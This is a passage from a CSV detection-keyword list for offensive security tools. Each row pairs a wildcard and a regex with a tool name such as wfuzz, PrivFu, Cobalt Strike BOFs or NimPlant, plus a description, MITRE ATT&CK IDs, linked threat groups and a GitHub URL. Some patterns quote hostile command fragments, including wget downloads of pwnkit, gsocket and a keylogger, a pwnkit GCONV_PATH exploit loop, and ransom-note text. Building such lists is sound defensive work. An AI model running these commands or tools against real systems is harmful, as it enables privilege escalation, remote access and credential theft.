"*wfpayload.bat*",".{0,1000}wfpayload\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62512"
"*wfpayload.py*",".{0,1000}wfpayload\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62513"
"*WfpEscalation.exe*",".{0,1000}WfpEscalation\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","62514"
"*WfpTokenDup.exe -*",".{0,1000}WfpTokenDup\.exe\s\-.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62515"
"*WfpTokenDup.exe*",".{0,1000}WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","62516"
"*wfuzz --*.txt*",".{0,1000}wfuzz\s\-\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62517"
"*wfuzz.bat*",".{0,1000}wfuzz\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62518"
"*wfuzz.get_payload*",".{0,1000}wfuzz\.get_payload.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62519"
"*wfuzz.py*",".{0,1000}wfuzz\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62520"
"*wfuzz.wfuzz*",".{0,1000}wfuzz\.wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62521"
"*wfuzz/wordlist*",".{0,1000}wfuzz\/wordlist.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62522"
"*wfuzz-cli.py*",".{0,1000}wfuzz\-cli\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62523"
"*wfuzzp.py*",".{0,1000}wfuzzp\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","62524"
"*wgen.py*",".{0,1000}wgen\.py.{0,1000}","offensive_tool_keyword","Python-Wordlist-Generator","Create awesome wordlists with Python.","T1110 - T1588 - T1602","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/agusmakmun/Python-Wordlist-Generator","1","0","N/A","N/A","N/A","2","122","35","2019-06-12T13:23:17Z","2015-05-22T12:32:01Z","62525"
"*wget *http-vuln-cve2020-5902.nse*",".{0,1000}wget\s.{0,1000}http\-vuln\-cve2020\-5902\.nse.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","62526"
"*wget http* -O pwnkit*",".{0,1000}wget\shttp.{0,1000}\s\-O\spwnkit.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","62527"
"*wget -qO- gsocket.io*",".{0,1000}wget\s\-qO\-\sgsocket\.io.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","62530"
"*wget* -O les.sh*",".{0,1000}wget.{0,1000}\s\-O\sles\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","62531"
"*wget*/drapl0n/DuckyLogger/blob/main/xinput\?raw=true*",".{0,1000}wget.{0,1000}\/drapl0n\/DuckyLogger\/blob\/main\/xinput\\\?raw\=true.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","62533"
"*Wh04m1001/DFSCoerce*",".{0,1000}Wh04m1001\/DFSCoerce.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","62536"
"*wh0amitz/BypassCredGuard*",".{0,1000}wh0amitz\/BypassCredGuard.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","62537"
"*wh0amitz/KRBUACBypass*",".{0,1000}wh0amitz\/KRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","62538"
"*wh0amitz/PetitPotato*",".{0,1000}wh0amitz\/PetitPotato.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","62539"
"*wh0amitz/S4UTomato*",".{0,1000}wh0amitz\/S4UTomato.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","62540"
"*wh0amitz/SharpADWS*",".{0,1000}wh0amitz\/SharpADWS.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","1","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","62541"
"*wh0amitz/SharpRODC*",".{0,1000}wh0amitz\/SharpRODC.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","62542"
"*Wh1t3Fox/polenum*",".{0,1000}Wh1t3Fox\/polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62543"
"*WhatBreach*",".{0,1000}WhatBreach.{0,1000}","offensive_tool_keyword","WhatBreach","WhatBreach is an OSINT tool that simplifies the task of discovering what breaches an email address has been discovered in. WhatBreach provides a simple and effective way to search either multiple. or a single email address and discover all known breaches that this email has been seen in. From there WhatBreach is capable of downloading the database if it is publicly available. downloading the pastes the email was seen in. or searching the domain of the email for further investigation. To perform this task successfully WhatBreach takes advantage of the following websites and/or APIs:","T1593.001 - T1593.002 - T1593.003","TA0010 - TA0011 - ","N/A","N/A","Reconnaissance","https://github.com/Ekultek/WhatBreach","1","0","N/A","N/A","N/A","10","1262","180","2024-10-22T18:52:55Z","2019-04-19T20:40:19Z","62544"
"*whatlicense-main.zip*",".{0,1000}whatlicense\-main\.zip.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","62545"
"*Where do you want to store PDF C2 output *",".{0,1000}Where\sdo\syou\swant\sto\sstore\sPDF\sC2\soutput\s.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","62548"
"*whereami.cna*",".{0,1000}whereami\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","62549"
"*whereami.x64*",".{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/whereami","1","1","N/A","N/A","10","10","172","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z","62550"
"*WheresMyImplant.cs*",".{0,1000}WheresMyImplant\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62551"
"*WheresMyImplant.git*",".{0,1000}WheresMyImplant\.git.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62552"
"*WheresMyImplant.sln*",".{0,1000}WheresMyImplant\.sln.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","62553"
"*while * do mv *GCONV_PATH=./value* done",".{0,1000}while\s.{0,1000}\sdo\smv\s.{0,1000}GCONV_PATH\=\.\/value.{0,1000}\sdone","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034 ","1","0","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","62555"
"*Whirlpool-Orig-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Orig\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62556"
"*Whirlpool-Tweak-512.verified.test-vectors.txt*",".{0,1000}Whirlpool\-Tweak\-512\.verified\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","62557"
"*Whisker.DSInternals*",".{0,1000}Whisker\.DSInternals.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62558"
"*Whisker.DSInternals.*",".{0,1000}Whisker\.DSInternals\..{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62559"
"*Whisker.DSInternals.*",".{0,1000}Whisker\.DSInternals\..{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62560"
"*Whisker.exe*",".{0,1000}Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62561"
"*whiskeysaml.py*",".{0,1000}whiskeysaml\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","62562"
"*whiskeysamlandfriends*",".{0,1000}whiskeysamlandfriends.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","62563"
"*Whitecat18/Rust-for-Malware-Development*",".{0,1000}Whitecat18\/Rust\-for\-Malware\-Development.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","62564"
"*WhiteOakSecurity/GoAWSConsoleSpray*",".{0,1000}WhiteOakSecurity\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","1","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","62565"
"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*",".{0,1000}whoami\s\/priv\s\|\sfindstr\s\/i\s\/C\:.{0,1000}SeImpersonatePrivilege.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62569"
"*whoami /user*",".{0,1000}whoami\s\/user.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","62571"
"*whoami.nim*",".{0,1000}whoami\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","62574"
"*whoami.py*",".{0,1000}whoami\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","62575"
"*WhoamiGetTokenInfo*",".{0,1000}WhoamiGetTokenInfo.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","62576"
"*WHOLE NETWORK HAS BEEN PENETRATED BY Black Hunt*",".{0,1000}WHOLE\sNETWORK\sHAS\sBEEN\sPENETRATED\sBY\sBlack\sHunt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62577"
"*WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt*",".{0,1000}WHOLE\sNETWORK\<\/span\>HAS\sBEEN\sPENETRATED\sBY\<span\>Black\sHunt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","62578"
"*why,are,you,reading,this,thing,huh=*",".{0,1000}why,are,you,reading,this,thing,huh\=.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","62579"
